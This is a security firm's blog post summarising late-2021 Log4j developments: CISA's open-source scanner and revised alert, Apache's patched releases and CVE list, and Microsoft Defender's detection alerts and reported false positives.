This article provides updates from The Cybersecurity and Infrastructure Security Agency (CISA), Apache and Microsoft who continue to work to develop patches and tools to help organizations protect themselves from one of the most severe cybersecurity vulnerabilities on record.
As many of us are just returning to the office from the holiday weekend, cybersecurity professionals around the globe continue to work around the clock to develop tools to identify and remediate Log4j vulnerabilities.
CISA Log4j Scanner Tool
CISA announced the release of a Log4j scanner last week that works to identify web services impacted by the CVE-2021-44228 and CVE-2021-45046 remote code execution vulnerabilities.
The open-sourced tool is based on scanners created by other members of the open-source community, including FullHunt’s automated scanning framework for the CVE-2021-442288 bug. According to CISA, the tool allows security teams to scan network hosts for Log4j RCE exposure and identify web application firewall bypasses that act as entry points for threat actors to potentially gain code execution within the environment.
Fuzzing for more than 60 HTTP request headers (not only 3-4 headers as previously seen tools)
Fuzzing for HTTP POST Data parameters
Fuzzing for JSON data parameters
Supports DNS callback for vulnerability discovery and validation
WAF Bypass payloads
CISA also revised the “Alert (AA21-356A) Mitigating Log4Shell and Other Log4j-Related Vulnerabilities” to include mitigation guidance for CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105 Log4j vulnerabilities. The revised alert is available at www.cisa.gov/uscert/ncas/alerts/aa21-356a.
Apache Fixes and Updates
Apache released Log4j version 2.17.1 this past Monday which fixes a newly discovered remote code execution (CVE-2021-44832) vulnerability. Prior to the release, version 2.17.0 was believed to be the safest release to upgrade to, but the new version is recommended until the next release.
Apache also released patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems according to Hacker News. Apache has now addressed four key vulnerabilities and updated their notes listed below.
CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)
Microsoft Defender for Containers is capable of discovering images affected by the vulnerabilities recently discovered in Log4j 2: CVE-2021-44228, CVE-2021-45046, and CVE-2021-45105. Images are automatically scanned for vulnerabilities in three different use cases: when pushed to an Azure container registry, when pulled from an Azure container registry, and when container images are running on a Kubernetes cluster.
Microsoft Defender for Endpoint
Alerts with the following titles in the Security Center indicate threat activity related to exploitation of the Log4j vulnerability on your network and should be immediately investigated and remediated. These alerts are supported on both Windows and Linux platforms:
Log4j exploitation detected – detects known behaviors that attackers perform following successful exploitation of the CVE-2021-44228 vulnerability
Log4j exploitation artifacts detected (previously titled Possible exploitation of CVE-2021-44228) – detects coin miners, shells, backdoor and payloads such as Cobalt Strike used by attackers post-exploitation
Log4j exploitation network artifacts detected (previously titled Network connection seen in CVE-2021-44228 exploitation) – detects network traffic connecting traffic connecting to an address associated with CVE-2021-44228 scanning or exploitation activity
Microsoft Defender for Servers
Microsoft Defender for Cloud’s threat detection capabilities have been expanded to ensure the exploitation of CVE-2021-44228 in several relevant security alerts.
However, reports of the tool capturing false positives started popping up on Twitter shortly after the release. Administrators reported receiving a message reading “Possible sensor tampering in memory was detected by Microsoft Defender for Endpoint”.
The Schneider Downs cybersecurity practice consists of experts offering a comprehensive set of information technology security services, including penetration testing, intrusion prevention/detection review, ransomware security, vulnerability assessments and a robust digital forensics and incident response team. For more information, visit www.schneiderdowns.com/cybersecurity or contact the team at [email protected].
You’ve heard our thoughts… We’d like to hear yours
The Schneider Downs Our Thoughts On blog exists to create a dialogue on issues that are important to organizations and individuals. While we enjoy sharing our ideas and insights, we’re especially interested in what you may have to say. If you have a question or a comment about this article – or any article from the Our Thoughts On blog – we hope you’ll share it with us. After all, a dialogue is an exchange of ideas, and we’d like to hear from you. Email us at [email protected].
Material discussed is meant for informational purposes only, and it is not to be construed as investment, tax, or legal advice. Please note that individual situations can vary. Therefore, this information should be relied upon when coordinated with individual professional advice.